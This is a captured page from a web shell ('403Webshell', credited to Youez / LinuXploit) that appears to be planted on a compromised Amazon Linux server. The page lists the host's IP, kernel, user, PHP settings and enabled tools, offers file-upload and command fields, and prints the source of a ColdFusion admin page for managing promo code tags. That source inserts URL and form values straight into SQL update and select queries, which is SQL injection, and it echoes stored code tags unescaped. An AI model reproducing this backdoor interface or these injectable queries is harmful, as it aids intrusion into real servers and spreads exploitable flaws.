403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/manage-tester.cfm
<Cfinclude template="header.cfm">

  <div id="content-header" style="margin-left:225px;">
    <h2>&nbsp;Manage Promo Tester</h2>
  </div>
  <div class="container-fluid" style="margin-left:200px;">



<cfif parameterexists(url.editsave)>
	

<cfquery name="upds" dataSource="#ds#">
	update tester
	set site = '#form.site#',
	placement = '#form.placement#',
codetag = '#form.codetag#',
notes = '#form.notes#',
datetime = #currentdatetime#
where id = #url.editsave#
</cfquery>	
	

</cfif>	

<Cfif parameterexists(url.edit)>

	
	<Cfquery name="getone" dataSource="#ds#">
		select * from tester
		where id = #url.edit#
	</cfquery>
	
	<cfFORM action="manage-tester.cfm?editsave=#url.edit#" method="post" name="MyForm" enctype="multipart/form-data">


	
  <br>
   <table cellspacing=5 cellpadding=5 border=1>
<cfoutput query="getone"> 
 <tr><td style="padding:8px;">
	  <b><font SIZE="-1" FACE="verdana">Placement:</font></b>
  </td><td style="padding:8px;">
      <Select name="placement">
      <option value="#placement#">#placement#</option>
      <option value="Top of Page Text Link">Top of Page Text Link</option>
      <option value="Article Text Bar">Article Text Bar</option>
      <option value="Masthead">Masthead</option>
      <option value="Middle">Middle</option>
      <option value="Mobile Anchor">Mobile Anchor</option>
      <option value="Article Bottom">Article Bottom</option>
      <option value="Event Pages">Event Pages</option>
      <option value="Events Main Page">Events Main Page</option>

</Select>  </td></tr>

<tr><td style="padding:8px;">
	  <b><font SIZE="-1" FACE="verdana">Site:</font></b>
  </td><td style="padding:8px;">
      <Select name="site">
      <option value="#site#">#site#</option>
      <option value="RP">RP</option>
      <option value="RP">NYMP</option>
</Select>
  </td></tr>
  
      <tr><td style="padding:8px;">
	  <b><font SIZE="-1" FACE="verdana">Code Tag:</font></b>
  </td><td style="padding:8px;">
  	<textarea name="codetag" style="width:500px;height:500px;">#codetag#</textarea>

  </td></tr>


      
      <tr><td style="padding:8px;">
	  <b><font SIZE="-1" FACE="verdana">Notes:</font></b>
  </td><td style="padding:8px;">
  	<textarea name="notes" style="width:500px;height:100px;">#notes#</textarea>

  </td></tr>



     </table><br>
<input type="submit" Value="Update Entry">
  
</cfoutput>



	</cfFORM>	
	


<cfelse>

<cfquery name="gettodaya" datasource="#ds#">
select * from tester
</cfquery>

<TAble class="table color-table primary-table table-bordered table-striped table-hover">
<thead>
	<th></th>
<th>PLACEMENT</th>	
<th>SITE</th>	

<th>UPDATED</th>	
<th>NOTES</th>	
<th>CODETAG</th>	

</thead>

<Cfoutput query="Gettodaya">
		
<tr>
<td><a href="manage-tester.cfm?edit=#id#">edit</a><Br>#id#</td>	
<td>#placement#</td>	

<td>#site#</td>	
<td>#datetime#</td>	
<td>#notes#</td>	
<td>#codetag#</td>
</tr>
</Cfoutput>
</Table>
</Cfif>	


<Br>
<cfinclude template="footer.cfm">

  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit